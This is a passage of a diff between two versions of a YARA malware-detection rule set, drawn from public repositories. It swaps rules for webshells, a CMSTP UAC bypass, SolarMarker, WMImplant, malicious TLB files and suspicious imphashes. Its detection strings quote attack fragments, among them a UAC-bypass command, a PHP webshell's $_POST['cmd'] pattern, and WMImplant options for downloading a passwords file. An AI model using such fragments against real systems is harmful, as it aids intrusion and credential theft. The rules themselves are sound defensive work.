ascii + $s9 = "synsend" ascii + $s10 = "bc_connect" ascii condition: - not any of ($ne*) and any of ($pat*) + uint16(0)==0x457f and (( all of ($x*) and 1 of ($s*)) or 5 of ($s*)) } -import "time" import "pe" -rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Uacbypass_CMSTPCMD : FILE +rule DITEKSHEN_MALWARE_Win_Solarmarker : FILE { meta: - description = "Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF" + description = "Detects SolarMarker" author = "ditekSHen" - id = "7bad57dc-ee8b-559d-8b17-af44c5bdf35b" - date = "2024-06-08" - modified = "2024-06-08" + id = "78c2f739-76b2-5a80-8b9a-6c677d578eaa" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_suspicious.yar#L1120-L1133" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "4cb92224d5a520dbd42d00d053aba3da21a49fda9391e5a462fd292d2e87e884" - score = 40 - quality = 41 + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L10727-L10745" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "84182c8948c2f40439cd932885ae8b88bb677ecc9fba366f22d30e13dc4ffb68" + score = 75 + quality = 75 tags = "FILE" - importance = 20 strings: - $s1 = "c:\\windows\\system32\\cmstp.exe" ascii wide nocase - $s2 = "taskkill /IM cmstp.exe /F" ascii wide nocase - $s3 = "CMSTPBypass" fullword ascii - $s4 = "CommandToExecute" fullword ascii - $s5 = "RunPreSetupCommands=RunPreSetupCommandsSection" fullword wide - $s6 = "\"HKLM\", \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\CMMGR32.EXE\", \"ProfileInstallPath\", \"%UnexpectedError%\", \"\"" fullword wide nocase + $x1 = "token_type" fullword ascii + $x2 = "request_data" fullword ascii + $x3 = "request_timeout" fullword ascii + $x4 = { 74 6f 6b 65 6e 73 00 66 72 6f 6d 00 74 6f 00 73 5f (66|72) } + $s1 = "set_UseShellExecute" fullword ascii + $s2 = "

" - $s5 = " echo \"\\n\";" + $x1 = "DRIVERS\\ipinip.sys" fullword wide + $s1 = "TsWorkSpaces.dll" fullword ascii + $s2 = "%SystemRoot%\\System32\\wiaservc.dll" fullword wide + $s3 = "/selfservice/microsites/search.php?%016I64d" fullword ascii + $s4 = "/solutions/company-size/smb/index.htm?%016I64d" fullword ascii + $s5 = "Microsoft Chart ActiveX Control" fullword wide + $s6 = "MSChartCtrl.ocx" fullword wide + $s7 = "{%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X}" fullword ascii + $s8 = "WUServiceMain" fullword ascii + $s9 = "Cookie: pgv_pvid=" ascii condition: - all of them + ( uint16(0)==0x5a4d and (1 of ($x*) or 3 of them )) or 5 of them } -rule SIGNATURE_BASE_BIN_Server +rule SIGNATURE_BASE_EXPL_Exploit_TLB_Scripts : FILE { meta: - description = "Webshells Auto-generated - file Server.exe" - author = "Florian Roth (Nextron Systems)" - id = "1625b0ee-5f9f-57d8-8333-f175f46d6c59" - date = "2023-12-05" + description = "Detects malicious TLB files which may be delivered via Visual Studio projects" + author = "Rich Warren (slightly modified by Florian Roth)" + id = "5151458e-4c30-50ff-a39e-e5b5b68b87aa" + date = "2021-01-26" modified = "2023-12-05" - reference = "https://github.com/Neo23x0/signature-base" - source_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/yara/thor-webshells.yar#L8956-L8972" - license_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/LICENSE" - hash = "1d5aa9cbf1429bb5b8bf600335916dcd" - logic_hash = "34f9d78e0f61717fae2945e7a833c2c6d59e28035ee95da2c5d32b4e196bc957" + reference = "https://github.com/outflanknl/Presentations/blob/master/Nullcon2020_COM-promise_-_Attacking_Windows_development_environments.pdf" + source_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/yara/exploit_tlb_scripts.yar#L2-L19" + license_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/LICENSE" + logic_hash = "39bf626d60a867d054762043f74e86998d6848439655f84be72003c112db9953" score = 75 quality = 85 - tags = "" - license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" + tags = "FILE" strings: - $s0 = "configserver" - $s1 = "GetLogicalDrives" - $s2 = "WinExec" - $s4 = "fxftest" - $s5 = "upfileok" - $s7 = "upfileer" + $a = ".sct" ascii nocase + $b = "script:" ascii nocase + $c = "scriptlet:" ascii nocase + $d = "soap:" ascii nocase + $e = "winmgmts:" ascii nocase condition: - all of them + uint32be(0)==0x4D534654 and filesize <100KB and any of them } -rule SIGNATURE_BASE_Hytop2006_Rar_Folder_2006 +rule SIGNATURE_BASE_Wmimplant { meta: - description = "Webshells Auto-generated - file 2006.asp" + description = "Auto-generated rule - file WMImplant.ps1" author = "Florian Roth (Nextron Systems)" - id = "bda89055-27f5-50b7-86a3-2c75a5f3eadc" - date = "2023-12-05" + id = "18dadc55-e12f-5c4c-9e11-27dc2d6c8dd2" + date = "2017-03-24" modified = "2023-12-05" - reference = "https://github.com/Neo23x0/signature-base" - source_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/yara/thor-webshells.yar#L8973-L8984" - license_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/LICENSE" - hash = "c19d6f4e069188f19b08fa94d44bc283" - logic_hash = "536232bbdd21bddb88eefe06a82927abcdd3ed10404c052957896960a6d10932" + reference = "https://www.fireeye.com/blog/threat-research/2017/03/wmimplant_a_wmi_ba.html" + source_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/yara/gen_wmi_implant.yar#L10-L28" + license_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/LICENSE" + logic_hash = "6422514d25b723e7ab92c1af1301e51d9a93aa41da98791d96c4754a91b5a18e" score = 75 quality = 85 tags = "" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" + hash1 = "860d7c237c2395b4f51b8c9bd0ee6cab06af38fff60ce3563d160d50c11d2f78" strings: - $s6 = "strBackDoor = strBackDoor " + $x1 = "Invoke-ProcessPunisher -Creds $RemoteCredential" fullword ascii + $x2 = "$Target -query \"SELECT * FROM Win32_NTLogEvent WHERE (logfile='security')" ascii + $x3 = "WMImplant -Creds" fullword ascii + $x4 = "-Download -RemoteFile C:\\passwords.txt" ascii + $x5 = "-Command 'powershell.exe -command \"Enable-PSRemoting" fullword ascii + $x6 = "Invoke-WMImplant" fullword ascii condition: - all of them + 1 of them } -rule SIGNATURE_BASE_R57Shell_3 +import "pe" + +rule SIGNATURE_BASE_MAL_Malware_Imphash_Mar23_1 : HIGHVOL FILE { meta: - description = "Webshells Auto-generated - file r57shell.php" - author = "Florian Roth (Nextron Systems)" - id = "4129d77c-2981-587b-a83e-8767dc3a48d8" - date = "2023-12-05" - modified = "2023-12-05" - reference = "https://github.com/Neo23x0/signature-base" - source_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/yara/thor-webshells.yar#L8985-L8996" - license_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/LICENSE" - hash = "87995a49f275b6b75abe2521e03ac2c0" - logic_hash = "0fdca080c7ce57b7bd818a968840aebf3c5c74f188ed062fec794bfadb4e75b0" + description = "Detects malware by known bad imphash or rich_pe_header_hash" + author = "Arnim Rupp" + id = "fb398c26-e9ac-55f9-b605-6b763021e96a" + date = "2023-03-20" + modified = "2023-03-22" + reference = "https://yaraify.abuse.ch/statistics/" + source_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/yara/gen_imphash_detection.yar#L4-L90" + license_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/LICENSE" + hash = "167dde6bd578cbfcc587d5853e7fc2904cda10e737ca74b31df52ba24db6e7bc" + hash = "0a25a78c6b9df52e55455f5d52bcb3816460001cae3307b05e76ac70193b0636" + hash = "d87a35decd0b81382e0c98f83c7f4bf25a2b25baac90c9dcff5b5a147e33bcc8" + hash = "5783bf969c36f13f4365f4cae3ec4ee5d95694ff181aba74a33f4959f1f19e8b" + hash = "4ca925b0feec851d787e7ee42d263f4c08b0f73f496049bdb5d967728ff91073" + hash = "9c2d2fa9c32fdff1828854e8cc39160dae73a4f90fb89b82ef6d853b63035663" + hash = "2c53d58f30b2ee1a2a7746e20f136c34d25d0214261783fc67e119329d457c2a" + hash = "5e83747015b0589b4f04b0db981794adf53274076c1b4acf717e3ff45eca0249" + hash = "ceaa0af90222ff3a899b9a360f6328cbda9ec0f5fbd18eb44bdc440470bb0247" + hash = "82fb1ba998dfee806a513f125bb64c316989c36c805575914186a6b45da3b132" + hash = "cb41d2520995abd9ba8ccd42e53d496a66da392007ea6aebd4cbc43f71ad461a" + hash = "c7bd758506b72ee6db1cc2557baf745bf9e402127d8e49266cc91c90f3cf3ed5" + hash = "e6e0d60f65a4ea6895ff97df340f6d90942bbfa402c01bf443ff5b4641ff849f" + hash = "e8ddef9fa689e98ba2d48260aea3eb8fa41922ed718b7b9135df6426b3ddf126" + hash = "ad57d77aba6f1bf82e0affe4c0ae95964be45fb3b7c2d6a0e08728e425ecd301" + hash = "483df98eb489899bc89c6a0662ca8166c9b77af2f6bedebd17e61a69211843d9" + hash = "a65ed85851d8751e6fe6a27ece7b3879b90866a10f272d8af46fb394b46b90a9" + hash = "09081e04f3228d6ef2efc1108850958ed86026e4dfda199852046481f4711565" + hash = "1b2c9054f44f7d08cffe7e2d9127dbd96206ab2c15b63ebf6120184950336ae1" + hash = "257887d1c84eb15abb2c3c0d7eb9b753ca961d905f4979a10a094d0737d97138" + hash = "1cbad8b58dbd1176e492e11f16954c3c254b5169dde52b5ad6d0d3c51930abf8" + hash = "a9897fd2d5401071a8219b05a3e9b74b64ad67ab75044b3e41818e6305a8d7b9" + hash = "aeac45fbc5d2a59c9669b9664400aeaf6699d76a57126d2f437833a3437a693e" + hash = "7b4c4d4676fab6c009a40d370e6cb53ea4fd73b09c23426fbaccc66d652f2a00" + hash = "b07f6873726276842686a6a6845b361068c3f5ce086811db05c1dc2250009cd0" + hash = "d1b3afebcacf9dd87034f83d209b42b0d79e66e08c0a897942fbe5fbd6704a0e" + hash = "074d52be060751cf213f6d0ead8e9ab1e63f055ae79b5fcbe4dd18469deea12b" + hash = "84d1fdef484fa9f637ae3d6820c996f6c5cf455470e8717ad348a3d80d2fb8e0" + hash = "437da123e80cfd10be5f08123cd63cfc0dc561e17b0bef861634d60c8a134eda" + hash = "f76c36eb22777473b88c6a5fc150fd9d6b5fac5b2db093f0ccd101614c46c7e7" + hash = "5498b7995669877a410e1c2b68575ca94e79014075ef5f89f0f1840c70ebf942" + hash = "af4e633acfba903e7c92342b114c4af4e694c5cfaea3d9ea468a4d322b60aa85" + hash = "d7d870f5afab8d4afa083ea7d7ce6407f88b0f08ca166df1a1d9bdc1a46a41b3" + hash = "974209d88747fbba77069bb9afa9e8c09ee37ae233d94c82999d88dfcd297117" + hash = "f2d99e7d3c59adf52afe0302b298c7d8ea023e9338c2870f74f11eaa0a332fc4" + hash = "b32c93be9320146fc614fafd5e6f1bb8468be83628118a67eb01c878f941ee5d" + hash = "bbd99acc750e6457e89acbc5da8b2a63b4ef01d4597d160e9cde5dc8bd04cf74" + hash = "dbff5ca3d1e18902317ab9c50be4e172640a8141e09ec13dcca986f2ec1dc395" + hash = "3ee1741a649f0b97bbeb05b6f9df97afda22c82e1e870177d8bdd34141ef163c" + hash = "222096fc800c8ea2b0e530302306898b691858324dbe5b8357f90407e9665b85" + hash = "b9995d1987c4e8b6fb30d255948322cfad9cc212c7f8f4c5db3ac80e23071533" + hash = "a6a92ea0f27da1e678c15beb263647de43f68608afe82d6847450f16a11fe6c0" + hash = "866e3ea86671a62b677214f07890ddf7e8153bec56455ad083c800e6ab51be37" + logic_hash = "dcb4d9a1ca83bbd26178895f20f9ab443f48f42aa3ad3df042c763c24ce8c047" score = 75 quality = 85 - tags = "" - license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" + tags = "HIGHVOL, FILE" + license = "Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License" strings: - $s1 = "\".$_POST['cmd']" + $fp1 = "Win32 Cabinet Self-Extractor" wide + $fp2 = "EXTRACTOPT" ascii fullword condition: - all of them + uint16(0)==0x5A4D and (pe.imphash()=="9ee34731129f4801db97fd66adbfeaa0" or pe.imphash()=="f9e8597c55008e10a8cdc8a0764d5341" or pe.imphash()=="0a76016a514d8ed3124268734a31e2d2" or pe.imphash()=="d3cbd6e8f81da85f6bf0529e69de9251" or pe.imphash()=="d8b32e731e5438c6329455786e51ab4b" or pe.imphash()=="cdf5bbb8693f29ef22aef04d2a161dd7" or pe.imphash()=="890e522b31701e079a367b89393329e6" or pe.imphash()=="bf5a4aa99e5b160f8521cadd6bfe73b8" or pe.imphash()=="646167cce332c1c252cdcb1839e0cf48" or pe.imphash()=="9f4693fc0c511135129493f2161d1e86" or pe.imphash()=="b4c6fff030479aa3b12625be67bf4914") and not 1 of ($fp*) } -rule SIGNATURE_BASE_Hdconfig +import "pe" + +rule SIGNATURE_BASE_HKTL_Imphashes_Aug22_1 : FILE { meta: - description = "Webshells Auto-generated - file HDConfig.exe" - author = "Florian Roth (Nextron Systems)" - id = "6f743137-e85a-5298-b51e-c8792e507d28" - date = "2023-12-05" - modified = "2023-12-05" - reference = "https://github.com/Neo23x0/signature-base" - source_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/yara/thor-webshells.yar#L8997-L9012" - license_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/LICENSE" - hash = "7d60e552fdca57642fd30462416347bd" - logic_hash = "9001f79db15548cf3ca931d0043d078db7d900ab26093afbf5cd44d0a85800f4" - score = 60 - quality = 55 - tags = "" - license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" - - strings: - $s0 = "An encryption key is derived from the password hash. " - $s3 = "A hash object has been created. " - $s4 = "Error during CryptCreateHash!" - $s5 = "A new key container has been created." - $s6 = "The password has been added to the hash. " + description = "Detects different hacktools based on their imphash" + author = "Florian Roth" + id = "e1d4dde6-16ad-5495-b3a7-01a86c830761" + date = "2022-08-17" + modified = "2023-03-21" + reference = "Internal Research" + source_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/yara/gen_imphash_detection.yar#L93-L192" + license_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/LICENSE" + logic_hash = "e76701b889138f9635cfe3a2f08710db3a6f0a3c3a15faa705ff0904d0566a1f" + score = 80 + quality = 85 + tags = "FILE" condition: - all of them + uint16(0)==0x5a4d and (pe.imphash()=="bcca3c247b619dcd13c8cdff5f123932" or pe.imphash()=="3a19059bd7688cb88e70005f18efc439" or pe.imphash()=="bf6223a49e45d99094406777eb6004ba" or pe.imphash()=="0c106686a31bfe2ba931ae1cf6e9dbc6" or pe.imphash()=="0d1447d4b3259b3c2a1d4cfb7ece13c3" or pe.imphash()=="1b0369a1e06271833f78ffa70ffb4eaf" or pe.imphash()=="4c1b52a19748428e51b14c278d0f58e3" or pe.imphash()=="4d927a711f77d62cebd4f322cb57ec6f" or pe.imphash()=="66ee036df5fc1004d9ed5e9a94a1086a" or pe.imphash()=="672b13f4a0b6f27d29065123fe882dfc" or pe.imphash()=="6bbd59cea665c4afcc2814c1327ec91f" or pe.imphash()=="725bb81dc24214f6ecacc0cfb36ad30d" or pe.imphash()=="9528a0e91e28fbb88ad433feabca2456" or pe.imphash()=="9da6d5d77be11712527dcab86df449a3" or pe.imphash()=="a6e01bc1ab89f8d91d9eab72032aae88" or pe.imphash()=="b24c5eddaea4fe50c6a96a2a133521e4" or pe.imphash()=="d21bbc50dcc169d7b4d0f01962793154" or pe.imphash()=="fcc251cceae90d22c392215cc9a2d5d6" or pe.imphash()=="23867a89c2b8fc733be6cf5ef902f2d1" or pe.imphash()=="a37ff327f8d48e8a4d2f757e1b6e70bc" or pe.imphash()=="f9a28c458284584a93b14216308d31bd" or pe.imphash()=="6118619783fc175bc7ebecff0769b46e" or pe.imphash()=="959a83047e80ab68b368fdb3f4c6e4ea" or pe.imphash()=="563233bfa169acc7892451f71ad5850a" or pe.imphash()=="87575cb7a0e0700eb37f2e3668671a08" or pe.imphash()=="13f08707f759af6003837a150a371ba1" or pe.imphash()=="1781f06048a7e58b323f0b9259be798b" or pe.imphash()=="233f85f2d4bc9d6521a6caae11a1e7f5" or pe.imphash()=="24af2584cbf4d60bbe5c6d1b31b3be6d" or pe.imphash()=="632969ddf6dbf4e0f53424b75e4b91f2" or pe.imphash()=="713c29b396b907ed71a72482759ed757" or pe.imphash()=="749a7bb1f0b4c4455949c0b2bf7f9e9f" or pe.imphash()=="8628b2608957a6b0c6330ac3de28ce2e" or pe.imphash()=="8b114550386e31895dfab371e741123d" or pe.imphash()=="94cb940a1a6b65bed4d5a8f849ce9793" or pe.imphash()=="9d68781980370e00e0bd939ee5e6c141" or pe.imphash()=="b18a1401ff8f444056d29450fbc0a6ce" or pe.imphash()=="cb567f9498452721d77a451374955f5f" or pe.imphash()=="730073214094cd328547bf1f72289752" or pe.imphash()=="17b461a082950fc6332228572138b80c" or pe.imphash()=="dc25ee78e2ef4d36faa0badf1e7461c9" or pe.imphash()=="819b19d53ca6736448f9325a85736792" or pe.imphash()=="829da329ce140d873b4a8bde2cbfaa7e" or pe.imphash()=="c547f2e66061a8dffb6f5a3ff63c0a74" or pe.imphash()=="0588081ab0e63ba785938467e1b10cca" or pe.imphash()=="0d9ec08bac6c07d9987dfd0f1506587c" or pe.imphash()=="bc129092b71c89b4d4c8cdf8ea590b29" or pe.imphash()=="4da924cf622d039d58bce71cdf05d242" or pe.imphash()=="e7a3a5c377e2d29324093377d7db1c66" or pe.imphash()=="9a9dbec5c62f0380b4fa5fd31deffedf" or pe.imphash()=="af8a3976ad71e5d5fdfb67ddb8dadfce" or pe.imphash()=="0c477898bbf137bbd6f2a54e3b805ff4" or pe.imphash()=="0ca9f02b537bcea20d4ea5eb1a9fe338" or pe.imphash()=="3ab3655e5a14d4eefc547f4781bf7f9e" or pe.imphash()=="e6f9d5152da699934b30daab206471f6" or pe.imphash()=="3ad59991ccf1d67339b319b15a41b35d" or pe.imphash()=="ffdd59e0318b85a3e480874d9796d872" or pe.imphash()=="0cf479628d7cc1ea25ec7998a92f5051" or pe.imphash()=="07a2d4dcbd6cb2c6a45e6b101f0b6d51" or pe.imphash()=="d6d0f80386e1380d05cb78e871bc72b1" or pe.imphash()=="38d9e015591bbfd4929e0d0f47fa0055" or pe.imphash()=="0e2216679ca6e1094d63322e3412d650" or pe.imphash()=="ada161bf41b8e5e9132858cb54cab5fb" or pe.imphash()=="2a1bc4913cd5ecb0434df07cb675b798" or pe.imphash()=="11083e75553baae21dc89ce8f9a195e4" or pe.imphash()=="a23d29c9e566f2fa8ffbb79267f5df80" or pe.imphash()=="4a07f944a83e8a7c2525efa35dd30e2f" or pe.imphash()=="767637c23bb42cd5d7397cf58b0be688" or pe.imphash()=="14c4e4c72ba075e9069ee67f39188ad8" or pe.imphash()=="3c782813d4afce07bbfc5a9772acdbdc" or pe.imphash()=="7d010c6bb6a3726f327f7e239166d127" or pe.imphash()=="89159ba4dd04e4ce5559f132a9964eb3" or pe.imphash()=="6f33f4a5fc42b8cec7314947bd13f30f" or pe.imphash()=="5834ed4291bdeb928270428ebbaf7604" or pe.imphash()=="5a8a8a43f25485e7ee1b201edcbc7a38" or pe.imphash()=="dc7d30b90b2d8abf664fbed2b1b59894" or pe.imphash()=="41923ea1f824fe63ea5beb84db7a3e74" or pe.imphash()=="3de09703c8e79ed2ca3f01074719906b" or pe.imphash()=="a53a02b997935fd8eedcb5f7abab9b9f" or pe.imphash()=="e96a73c7bf33a464c510ede582318bf2" or pe.imphash()=="32089b8851bbf8bc2d014e9f37288c83" or pe.imphash()=="09D278F9DE118EF09163C6140255C690" or pe.imphash()=="03866661686829d806989e2fc5a72606" or pe.imphash()=="e57401fbdadcd4571ff385ab82bd5d6d" or pe.imphash()=="84B763C45C0E4A3E7CA5548C710DB4EE" or pe.imphash()=="19584675d94829987952432e018d5056" or pe.imphash()=="330768a4f172e10acb6287b87289d83b") } -rule SIGNATURE_BASE_FSO_S_Ajan_2 +import "pe" + +rule SIGNATURE_BASE_SUSP_Imphash_Mar23_2 : HIGHVOL FILE { meta: - description = "Webshells Auto-generated - file ajan.asp" - author = "Florian Roth (Nextron Systems)" - id = "a66c34ed-0ae2-5e04-bfc4-c82583c5e066" - date = "2023-12-05" - modified = "2023-12-05" - reference = "https://github.com/Neo23x0/signature-base" - source_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/yara/thor-webshells.yar#L9013-L9025" - license_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/LICENSE" - hash = "22194f8c44524f80254e1b5aec67b03e" - logic_hash = "0ac31ee735c94289932369dfba5b408cbf71cc23fd48ce3e09dc7ce640a0d733" - score = 75 + description = "Detects imphash often found in malware samples (Zero hits with with search for 'imphash:x p:0' on Virustotal)" + author = "Arnim Rupp (https://github.com/ruppde)" + id = "b739d540-5d9f-53b3-9e42-a514dc972e8d" + date = "2023-03-23" + modified = "2023-11-25" + reference = "Internal Research" + source_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/yara/gen_imphash_detection.yar#L194-L295" + license_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/LICENSE" + hash = "12bf2795f4a140adbaa0af6ad4b2508d398d8ba69e9dadb155f800b10f7458c4" + hash = "14ec56489fbcc3c7f1ef9a4d4a80ff302a5e233cdc4429a29c635a88fb1278d6" + hash = "13731912823d6ce01c28a8d7d7f961505f461620bb35adbb409d4954ba1f4b8e" + hash = "15e59cc5d7b83e63d40dbfd8406701cb4decd31353f68fda47238d073c87e4ea" + hash = "13e5bb40be20b1a0bc28081ce7798f339c28c9652cb37b538c29872dfd0cd51d" + hash = "16f963afdb30b38ba4b8b98ce56a37626e9fd87de9eba5f9903d2ba7f8a77788" + hash = "168f22d02304ce66be88d2370c8fa7c7d9aa2ccf80f8e376edfeabfc9b96c73d" + hash = "9e7701450dbcbd35083e34df935bd77a95735c4b441e0fc8eacd543a621f2fa5" + hash = "51205c100702b21cce600692d69f3b108f49228e53f36678dd8b39434406526b" + hash = "c9b48e8b0e7c6fa75886554659bc0529e454d84b29daa07bd4323aca9a33f607" + hash = "ba5c06703bd3c093afa89e45d86aaf6c151fbaef44ebf3b65c97f3b376a88c72" + hash = "7281afc138e8e898aee16d415cd02a29dc5dedda5b11c23934aac0ebd208373b" + hash = "10a091b2468a8286f7b1a580d8923aef48856b43014e849035f05c4dbdc0a413" + hash = "56c04e76427bd982be83799d0a435732193d7bf5a70cdeba5eb63eaf0d4ebb77" + hash = "0aa8b7eddc4792a82f247702442c04e50173bd7712a4b596545916480942853b" + hash = "627f043ad875c182682149653363b7f856dd618d169821b18df7bc9cdf6269d8" + hash = "e1df460fd99c4f901859f3a8ec23b041ba9f4b79897dec349a96d6a27fb3e335" + hash = "f10ecbd8031ce85b782c59682ff32301a65e0975687977688771f1057fb063d1" + hash = "1bc7b8932b5b077b359c79e7ca664938b7a487a4e7e6b99d6647d6803bc677c5" + hash = "01f81029a5e93cbfecfbc81cbd4a2ffd1bb1b6159e2a144a21e58caf8dab9661" + hash = "cd33a71f71e2971667bacb0da71f2d36073777993b9581ec90bbf042162c3530" + hash = "4aab991149cb2dc8c0c0a323af3acbbd73d6a22177910ef3af92b05ae7c9ae7b" + hash = "df05fa3983c9e623388231d366dba4e435575ca53421d3f0bcb0fb346dd971d4" + hash = "14de3584fe7108386f7637c2bd343f30341c0fa2102d52bb35ee772b5b7672f0" + hash = "c4d9ad5cffd9aa13dfe3acbf0905810e28ff96d231541d7e209327ca5b0b24fe" + hash = "5e0bed2269dc34c6cc2db30b0a53282e6debb85b3c90a857d1be4cfd06312211" + hash = "3aa13e72382a2d7da592273b8c18a42106b65db528e16b6066646812e81555c4" + hash = "244c4a930e3644ffb96bf3ab33e8c8c0f94ed9fe6a8b2fc45fc8e9b6471ef3a8" + hash = "f00848b8edeeb5a668bf7e89e3f33f438b2f5d5cf130596a8ed2531e21be6d81" + hash = "5b9348c24ff604e78d70464654e645b90dc695c7e0415959c443fe29cebc3c4e" + logic_hash = "c6482cbc01a880ffd3056d28a2fde8f87402b1f85d36075c1f0b50788d469ca3" + score = 65 quality = 85 - tags = "" - license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" - - strings: - $s2 = "\"Set WshShell = CreateObject(\"\"WScript.Shell\"\")" - $s3 = "/file.zip" + tags = "HIGHVOL, FILE" + license = "Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License" condition: - all of them + uint16(0)==0x5A4D and (pe.imphash()=="e4290fa6afc89d56616f34ebbd0b1f2c" or pe.imphash()=="8abecba2211e61763c4c9ffcaa13369e" or pe.imphash()=="a64e048b98d051ae6e6b6334f77c95d3" or pe.imphash()=="359d89624a26d1e756c3e9d6782d6eb0" or pe.imphash()=="c2a87fabf96470db507b2e6b43bd92eb" or pe.imphash()=="62ec3dce1eba1b68f6a4511bb09f8c2c" or pe.imphash()=="5662cfcdfd9da29cb429e7528d5af81e" or pe.imphash()=="406c785a6e2c6970c1e8ed62877e197b" or pe.imphash()=="dbf687d6aa2a6cafe4349f7b0821a792" or pe.imphash()=="6dca3e9fb3928bbdb54dbce669943ec8" or pe.imphash()=="f1a539a5b71ad53ac586f053145f08ec" or pe.imphash()=="3a2003ea545fe942681da9e7683ebb58" or pe.imphash()=="a8286b574ff850cd002ea6282d15aa40" or pe.imphash()=="3c8577ca4bab2f95cc6fc73ef1895288" or pe.imphash()=="84706849fa809feaa385711a628be029" or pe.imphash()=="ba23a556ac1d6444f7f76feafd6c8867" or pe.imphash()=="95e6f8741083e0c7d9a63d45e2472360" or pe.imphash()=="774d797db707398fd2ef1979d02634d5" or pe.imphash()=="8c16c795b57934183422be5f6df7d891" or pe.imphash()=="98f67c550a7da65513e63ffd998f6b2e" or pe.imphash()=="e836076a09dba03e4d6faa46dda0fefc" or pe.imphash()=="ff63dc9c65eb25911a9bc535c8f06ad0" or pe.imphash()=="08b67a9663d3a8c9505f3b2561bbdd1c" or pe.imphash()=="135e92fc9902f3140f2e5a51458efdf0" or pe.imphash()=="4753904c40d638a1bc745c65b88291d5" or pe.imphash()=="0f44bf2b3b0b8d5ecae5689ff1d0e90d" or pe.imphash()=="c4c9ecfc26ca516a80b8f6f5b2bdb7e6" or pe.imphash()=="46ad3d954e527f769e37017b3e128039" or pe.imphash()=="802dcac7aab948c19738ba3df9f356d9" or pe.imphash()=="b36a21279375c40e6f4c1ea347f906de" or pe.imphash()=="77a185e903c5527243ef219b003bfd38" or pe.imphash()=="12a30b523ac71a3cbe9145c89400dd7f" or pe.imphash()=="cc40fefa3af5cd00cc28dbd874038a4d" or pe.imphash()=="3d8c26f4cb1782a87c3bb42796fb6b85" or pe.imphash()=="2f4ddcfebbcad3bacadc879747151f6f" or pe.imphash()=="76812f441b0ed9d3cc0748af25d689a3" or pe.imphash()=="9a06f0024c1694774ae97311608bab5b" or pe.imphash()=="481f47bbb2c9c21e108d65f52b04c448" or pe.imphash()=="286870a926664a5129b8b68ed0d4a8eb" or pe.imphash()=="a0db151d55761167d93eba72d3d94b32" or pe.imphash()=="663243fe4d94e1304b265ce4011cd01b" or pe.imphash()=="f24e64014af9015dc25262e5076fe61f" or pe.imphash()=="b7d08302c927428e16a2ad8d18b9d2b7" or pe.imphash()=="352063077f27a851dc2b08e15f08105e" or pe.imphash()=="b0b97d1a91a2730b3daa8bbb2e86b402" or pe.imphash()=="bc96f1c981700752dc2cf9553da99eb6" or pe.imphash()=="f68ddef5f29b66bbd543e947c8743bb0" or pe.imphash()=="6dfbc160505aa2f7205766eaa6fe72a1" or pe.imphash()=="a202429ffe8d8c8b722572cffd5681a7" or pe.imphash()=="342a3708d93b6b819b7b1a768201a747" or pe.imphash()=="cdc00badc7162acde9bb032e793ac137" or pe.imphash()=="be19e18d6a8b41631d40059031a928bb" or pe.imphash()=="0c54f96a844b02689687407de9b6663e" or pe.imphash()=="fa5f28e70130a452b7c0a51db5544ef9" or pe.imphash()=="2e5708ae5fed0403e8117c645fb23e5b" or pe.imphash()=="8d92fa1956a6a631c642190121740197" or pe.imphash()=="dc73a9bd8de0fd640549c85ac4089b87") } -rule SIGNATURE_BASE_Webshell_And_Exploit_CN_APT_HK : WEBSHELL +import "pe" + +rule SIGNATURE_BASE_SUSP_Imphash_Mar23_3 : FILE { meta: - description = "Webshell and Exploit Code in 